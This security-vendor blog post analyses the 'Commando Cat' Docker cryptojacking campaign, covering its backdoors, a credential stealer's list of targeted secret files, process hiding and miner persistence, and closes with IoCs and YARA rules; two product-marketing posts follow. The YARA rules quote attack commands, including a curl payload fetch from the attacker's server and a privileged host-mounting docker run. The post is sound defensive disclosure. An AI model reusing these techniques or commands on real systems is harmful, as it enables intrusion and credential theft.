Blog
/
Cloud
/
January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
02
Jan 2024

Summary

  • Commando Cat is a novel cryptojacking campaign exploiting Docker for Initial Access
  • The campaign deploys a benign container generated using the Commando Project [1]
  • The attacker escapes this container and runs multiple payloads on the Docker host
  • The campaign deploys a credential stealer payload, targeting Cloud Service Provider credentials (AWS, GCP, Azure)
  • The other payloads exhibit a variety of sophisticated techniques, including an interesting process hiding technique (as discussed below) and a Docker Registry blackhole

Introduction: Commando cat

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet by the IP 45[.]9.148.193 (which is the same as C2). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project “generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command.” 

It is likely used by the attacker to seem like a benign tool and not arouse suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Figure 1: Container with custom command to execute

It uses the chroot to escape from the container onto the host operating system. This initial command checks if the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • Dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear - this service is not used anywhere in the malware, nor is it part of Linux. It is possible that the service is part of another campaign that the attacker does not want to compete with.

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Figure 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. A common tactic of cryptojacking campaigns is that they will rename these binaries to evade detection, likely the attacker is anticipating that this box was previously infected by a campaign that renamed the binaries to this, and is undoing that. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64 encoded script instead of being pulled down from the C2, this will be discussed in a later section.

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Figure 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH key into the root user’s authorized_keys file:

function make_ssh_backdoor
Figure 4

It then updates a number of SSH config options in order to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile variable to a local variable named “$hidden_authorized_keys”, however this variable is never actually defined in the script, resulting in public key authentication breaking.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely as an attempt to appear as legitimate. To continue this theme, the attacker also has opted to set the login shell for the “games” user as /usr/bin/nologin. This is not the path for the real nologin binary, and is instead a copy of bash placed here by the malware. This makes the “games” user appear as a regular service account, while actually being a backdoor.

Games user
Figure 5

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Figure 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Figure 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has been commonly used as a payload before, as an example, UNC2891 has made extensive use of TinyShell during their attacks on Oracle Solaris based systems [4].
The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, to then connect to the infected machine.

Script
Figure 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Figure 9

This script works by cloning the Linux mtab file (a list of the active mounts) to another directory. It then creates a new bind mount for the /proc/pid directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/pid directory to show an empty directory, causing tools like ps aux to omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. It’s purpose is likely for acting as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way - in order for nodes to find each other, they use their shared secret instead of IP address using the  service. This permits gs-netcat to function in virtually every environment as it circumvents many firewalls on both the client and server end. To calculate a shared secret, the script simply uses the victims IP and hostname:

Script
Figure 10

This is more acceptable than tsh from a security point of view, there are 4 billion possible IP addresses and many more possible hostnames, making a brute force harder, although still possible by using strategies such as lists of common hostnames and trying IPs from blocks known for hosting virtual servers such as AWS.

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly to note, the attacker will use the cmd.cat containers to untar the downloaded payload, if tar is not available on the system or fails. Instead of using /tmp, it also uses /dev/shm instead, which acts as a temporary file store, but memory backed instead. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. This also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before in BPFdoor - a high-profile Linux campaign [6].

Script
Figure 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware to obtain persistence; however not all systems use systemd, resulting in this payload being rendered entirely ineffective on these systems. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Figure 12

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Figure 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Figure 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as IMDS, and environment variables. Interestingly, the script creates a file so that once the script runs the first time, it can never be run again as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as making the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts that have been previously attributed to TeamTNT and could have been copied from one of their campaigns [7.] However, script-based attribution is difficult, and while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Figure 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber script. Firstly, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and the security credentials for it. The timeout is likely used to stop this part of the script taking a long time to run on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so can be rendered ineffective by enforcing IMDSv2.

Script
Figure 16

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, are then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to store captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Figure 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root file system for their name, and the results appended to a temporary file, before the final concatenation of the credentials files is read back into the CSOF variable.

CSOF variable
Figure 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads out their environment variables into CSOF. This is interesting as the payload already checks the environment variables in a lot of cases, such as in the aws, google, and azure grabbers. So, it is unclear why they grab all data, but then grab specific portions of the data again.

Code
Figure 19

Regardless of what data it has already grabbed, get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber, where it checks for the existence of a variable and then appends its contents (or the file’s contents if the variable is path) to CSOF.

Code
Figure 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Figure 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Figure 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. Firstly, it removes all containers that have a command of /bin/bash -c 'apt-get or busybox, and then it removes all containers that do not have a command that contains chroot (which is the initial command used by this payload).

Code
Figure 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner” and stops & disables the services. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying their own miner, so that they aren't competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary, should a file with .upd be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name docker cache daemon to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm .

Code
Figure 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy services by creating a bind mount over their /proc entry. The effect of this is that if a system administrator were to use a tool like htop to try and see what process was using up the CPU on the server, they would not be able to see the process.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Figure 25

Next, it blackholes the docker registry by writing it's hostname to /etc/hosts with an IP of 0.0.0.0

Code
Figure 26

This completely blocks other attackers from pulling their images/tools onto the box, eliminating the risk of competition. Keeping the Alpine image named as docker/firstrun allows the attacker to still use the docker API to spawn an alpine box they can use to break back in, as it is already downloaded so the blackhole has no effect.

Conclusion

This malware sample, despite being primarily scripts, is a sophisticated campaign with a large amount of redundancy and evasion that makes detection challenging. The usage of the hid process hider script is notable as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker Registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 
meta: 

        description = "Detects CommandoCat aws.sh credential stealer script" 
 
        license = "Apache License 2.0" 
 
        date = "2024-01-25" 
 
        hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 
    strings: 
 
        // Constants 

        $const1 = "CRED_FILE_NAMES" 
 
        $const2 = "MIXED_CREDFILES" 
 
        $const3 = "AWS_CREDS_FILES" 
 
        $const4 = "GCLOUD_CREDS_FILES" 
 
        $const5 = "AZURE_CREDS_FILES" 
 
        $const6 = "VICOIP" 
 
        $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. www.darktrace.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

More in this series

No items found.

Blog

/

Proactive Security

/

October 24, 2025

Patch Smarter, Not Harder: Now Empowering Security Teams with Business-Aligned Threat Context Agents

Patch Smarter, Not Harder: Now Empowering Security Teams with Business-Aligned Threat Context Agents Default blog imageDefault blog image

Most risk management programs remain anchored in enumeration: scanning every asset, cataloging every CVE, and drowning in lists that rarely translate into action. Despite expensive scanners, annual pen tests, and countless spreadsheets, prioritization still falters at two critical points.

Context gaps at the device level: It’s hard to know which vulnerabilities actually matter to your business given existing privileges, what software it runs, and what controls already reduce risk.

Business translation: Even when the technical priority is clear, justifying effort and spend in financial terms—especially across many affected devices—can delay action. Especially if it means halting other areas of the business that directly generate revenue.

The result is familiar: alert fatigue, “too many highs,” and remediation that trails behind the threat landscape. Darktrace / Proactive Exposure Management addresses this by pairing precise, endpoint‑level context with clear, financial insight so teams can prioritize confidently and mobilize faster.

A powerful combination: No-Telemetry Endpoint Agent + Cost-Benefit Analysis

Darktrace / Proactive Exposure Management now uniquely combines technical precision with business clarity in a single workflow.  With this release, Darktrace / Proactive Exposure Management delivers a more holistic approach, uniting technical context and financial insight to drive proactive risk reduction. The result is a single solution that helps security teams stay ahead of threats while reducing noise, delays, and complexity.

  • No-Telemetry Endpoint: Collects installed software data and maps it to known CVEs—without network traffic—providing device-level vulnerability context and operational relevance.
  • Cost-Benefit Analysis for Patching: Calculates ROI by comparing patching effort with potential exploit impact, factoring in headcount time, device count, patch difficulty, and automation availability.

Introducing the No-Telemetry Endpoint Agent

Darktrace’s new endpoint agent inventories installed software on devices and maps it to known CVEs without collecting network data so you can prioritize using real device context and available security controls.

By grounding vulnerability findings in the reality of each endpoint, including its software footprint and existing controls, teams can cut through generic severity scores and focus on what matters most. The agent is ideal for remote devices, BYOD-adjacent fleets, or environments standardizing on Darktrace, and is available without additional licensing cost.

Darktrace / Proactive Exposure Management user interface
Figure 1: Darktrace / Proactive Exposure Management user interface

Built-In Cost-Benefit Analysis for Patching

Security teams often know what needs fixing but stakeholders need to understand why now. Darktrace’s new cost-benefit calculator compares the total cost to patch against the potential cost of exploit, producing an ROI for the patch action that expresses security action in clear financial terms.

Inputs like engineer time, number of affected devices, patch difficulty, and automation availability are factored in automatically. The result is a business-aligned justification for every patching decision—helping teams secure buy-in, accelerate approvals, and move work forward with one-click ticketing, CSV export, or risk acceptance.

Darktrace / Proactive Exposure Management Cost Benefit Analysis
Figure 2: Darktrace / Proactive Exposure Management Cost Benefit Analysis

A Smarter, Faster Approach to Exposure Management

Together, the no-telemetry endpoint and Cost–Benefit Analysis advance the CTEM motion from theory to practice. You gain higher‑fidelity discovery and validation signals at the device level, paired with business‑ready justification that accelerates mobilization. The result is fewer distractions, clearer priorities, and faster measurable risk reduction. This is not from chasing every alert, but by focusing on what moves the needle now.

  • Smarter Prioritization: Device‑level context trims noise and spotlights the exposures that matter for your business.
  • Faster Decisions: Built‑in ROI turns technical urgency into executive clarity—speeding approvals and action.
  • Practical Execution: Privacy‑conscious endpoint collection and ticketing/export options fit neatly into existing workflows.
  • Better Outcomes: Close the loop faster—discover, prioritize, validate, and mobilize—on the same operating surface.

Committed to innovation

These updates are part of the broader Darktrace release, which also included:

1. Major innovations in cloud security with the launch of the industry’s first fully automated cloud forensics solution, reinforcing Darktrace’s leadership in AI-native security.

2. Darktrace Network Endpoint eXtended Telemetry (NEXT) is revolutionizing NDR with the industry’s first mixed-telemetry agent using Self-Learning AI.

3. Improvements to our OT product, purpose built for industrial infrastructure, Darktrace / OT now brings dedicated OT dashboard, segmentation-aware risk modeling, and expanded visibility into edge assets and automation protocols.

Join our Live Launch Event

When? 

December 9, 2025

What will be covered?

Join our live broadcast to experience how Darktrace is eliminating blind spots for detection and response across your complete enterprise with new innovations in Agentic AI across our ActiveAI Security platform. Industry leaders from IDC will join Darktrace customers to discuss challenges in cross-domain security, with a live walkthrough reshaping the future of Network Detection & Response, Endpoint Detection & Response, Email Security, and SecOps in novel threat detection and autonomous investigations.

Continue reading
About the author
Kelland Goodin
Product Marketing Specialist

Blog

/

Proactive Security

/

October 24, 2025

Darktrace Announces Extended Visibility Between Confirmed Assets and Leaked Credentials from the Deep and Dark Web

Darktrace Announces Extended Visibility Between Confirmed Assets and Leaked Credentials from the Deep and Dark Web Default blog imageDefault blog image

Why exposure management needs to evolve beyond scans and checklists

The modern attack surface changes faster than most security programs can keep up. New assets appear, environments change, and adversaries are increasingly aided by automation and AI. Traditional approaches like periodic scans, static inventories, or annual pen tests are no longer enough. Without a formal exposure program, many businesses are flying blind, unaware of where the next threat may emerge.

This is where Continuous Threat Exposure Management (CTEM) becomes essential. Introduced by Gartner, CTEM helps organizations continuously assess, validate, and improve their exposure to real-world threats. It reframes the problem: scope your true attack surface, prioritize based on business impact and exploitability, and validate what attackers can actually do today, not once a year.

With two powerful new capabilities, Darktrace / Attack Surface Management helps organizations evolve their CTEM programs to meet the demands of today’s threat landscape. These updates make CTEM a reality, not just a strategy.

Too much data, not enough direction

Modern Attack Surface Management tools excel at discovering assets such as cloud workloads, exposed APIs, and forgotten domains. But they often fall short when it comes to prioritization. They rely on static severity scores or generic CVSS ratings, which do not reflect real-world risk or business impact.

This leaves security teams with:

  • Alert fatigue from hundreds of “critical” findings
  • Patch paralysis due to unclear prioritization
  • Blind spots around attacker intent and external targeting

CISOs need more than visibility. They need confidence in what to fix first and context to justify those decisions to stakeholders.

Evolving Attack Surface Management

Attack Surface Management (ASM) must evolve from static lists and generic severity scores to actionable intelligence that helps teams make the right decision now.

Joining the recent addition of Exploit Prediction Assessment, which debuted in late June 2025, today we’re introducing two capabilities that push ASM into that next era:

  • Exploit Prediction Assessment: Continuously validates whether top-priority exposures are actually exploitable in your environment without waiting for patch cycles or formal pen tests.  
  • Deep & Dark Web Monitoring: Extends visibility across millions of sources in the deep and dark web to detect leaked credentials linked to your confirmed domains.
  • Confidence Score: our newly developed AI classification platform will compare newly discovered assets to assets that are known to belong to your organization. The more these newly discovered assets look similar to assets that belong to your organization, the higher the score will be.

Together, these features compress the window from discovery to decision, so your team can act with precision, not panic. The result is a single solution that helps teams stay ahead of attackers without introducing new complexities.

Exploit Prediction Assessment

Traditional penetration tests are invaluable, but they’re often a snapshot of that point-in-time, are potentially disruptive, and compliance frameworks still expect them. Not to mention, when vulnerabilities are present, teams can act immediately rather than relying solely on information from CVSS scores or waiting for patch cycles.  

Unlike full pen tests which can be obtrusive and are usually done only a couple times per year, Exploit Prediction Assessment is surgical, continuous, and focused only on top issues Instead of waiting for vendor patches or the next pen‑test window. It helps confirm whether a top‑priority exposure is actually exploitable in your environment right now.  

For more information on this visit our blog: Beyond Discovery: Adding Intelligent Vulnerability Validation to Darktrace / Attack Surface Management

Deep and Dark Web Monitoring: Extending the scope

Customers have been asking for this for years, and it is finally here. Defense against the dark web. Darktrace / Attack Surface Management’s reach now spans millions of sources across the deep and dark web including forums, marketplaces, breach repositories, paste sites, and other hard‑to‑reach communities to detect leaked credentials linked to your confirmed domains.  

Monitoring is continuous, so you’re alerted as soon as evidence of compromise appears. The surface web is only a fraction of the internet, and a sizable share of risk hides beyond it. Estimates suggest the surface web represents roughly ~10% of all online content, with the rest gated or unindexed—and the TOR-accessible dark web hosts a high proportion of illicit material (a King’s College London study found ~57% of surveyed onion sites contained illicit content), underscoring why credential leakage and brand abuse often appear in places traditional monitoring doesn’t reach. Making these spaces high‑value for early warning signals when credentials or brand assets appear. Most notably, this includes your company’s reputation, assets like servers and systems, and top executives and employees at risk.

What changes for your team

Before:

  • Hundreds of findings, unclear what to start with
  • Reactive investigations triggered by incidents

After:

  • A prioritized backlog based on confidence score or exploit prediction assessment verification
  • Proactive verification of exposure with real-world risk without manual efforts

Confidence Score: Prioritize based on the use-case you care most about

What is it?

Confidence Score is a metric that expresses similarity of newly discover assets compared to the confirmed asset inventory. Several self-learning algorithms compare features of assets to be able to calculate a score.

Why it matters

Traditional Attack Surface Management tools treat all new discovery equally, making it unclear to your team how to identify the most important newly discovered assets, potentially causing you to miss a spoofing domain or shadow IT that could impact your business.

How it helps your team

We’re dividing newly discovered assets into separate insight buckets that each cover a slightly different business case.

  • Low scoring assets: to cover phishing & spoofing domains (like domain variants) that are just being registered and don't have content yet.
  • Medium scoring assets: have more similarities to your digital estate, but have better matching to HTML, brand names, keywords. Can still be phishing but probably with content.
  • High scoring assets: These look most like the rest of your confirmed digital estate, either it's phishing that needs the highest attention, or the asset belongs to your attack surface and requires asset state confirmation to enable the platform to monitor it for risks.

Smarter Exposure Management for CTEM Programs

Recent updates to Darktrace / Attack Surface Management directly advance the core phases of Continuous Threat Exposure Management (CTEM): scope, discover, prioritize, validate, and mobilize. The new Exploit Prediction Assessment helps teams validate and prioritize vulnerabilities based on real-world exploitability, while Deep & Dark Web Monitoring extends discovery into hard-to-reach areas where stolen data and credentials often surface. Together, these capabilities reduce noise, accelerate remediation, and help organizations maintain continuous visibility over their expanding attack surface.

Building on these innovations, Darktrace / Attack Surface Management empowers security teams to focus on what truly matters. By validating exploitability, it cuts through the noise of endless vulnerability lists—helping defenders concentrate on exposures that represent genuine business risk. Continuous monitoring for leaked credentials across the deep and dark web further extends visibility beyond traditional asset discovery, closing critical blind spots where attackers often operate. Crucially, these capabilities complement, not replace, existing security controls such as annual penetration tests, providing continuous, low-friction validation between formal assessments. The result is a more adaptive, resilient security posture that keeps pace with an ever-evolving threat landscape.

If you’re building or maturing a CTEM program—and want fewer open exposures, faster remediation, and better outcomes, Darktrace / Attack Surface Management’s new Exploit Prediction Assessment and Deep & Dark Web Monitoring are ready to help.

  • Want a more in-depth look at how Exploit Prediction Assessment functions? Read more here

Committed to innovation

These updates are part of the broader Darktrace release, which also included:

1. Major innovations in cloud security with the launch of the industry’s first fully automated cloud forensics solution, reinforcing Darktrace’s leadership in AI-native security.

2. Darktrace Network Endpoint eXtended Telemetry (NEXT) is revolutionizing NDR with the industry’s first mixed-telemetry agent using Self-Learning AI.

3. Improvements to our OT product, purpose built for industrial infrastructure, Darktrace / OT now brings dedicated OT dashboard, segmentation-aware risk modeling, and expanded visibility into edge assets and automation protocols.

Join our Live Launch Event

When? 

December 9, 2025

What will be covered?

Join our live broadcast to experience how Darktrace is eliminating blind spots for detection and response across your complete enterprise with new innovations in Agentic AI across our ActiveAI Security platform. Industry leaders from IDC will join Darktrace customers to discuss challenges in cross-domain security, with a live walkthrough reshaping the future of Network Detection & Response, Endpoint Detection & Response, Email Security, and SecOps in novel threat detection and autonomous investigations.

Continue reading
About the author
Kelland Goodin
Product Marketing Specialist
Your data. Our AI.
Elevate your network security with Darktrace AI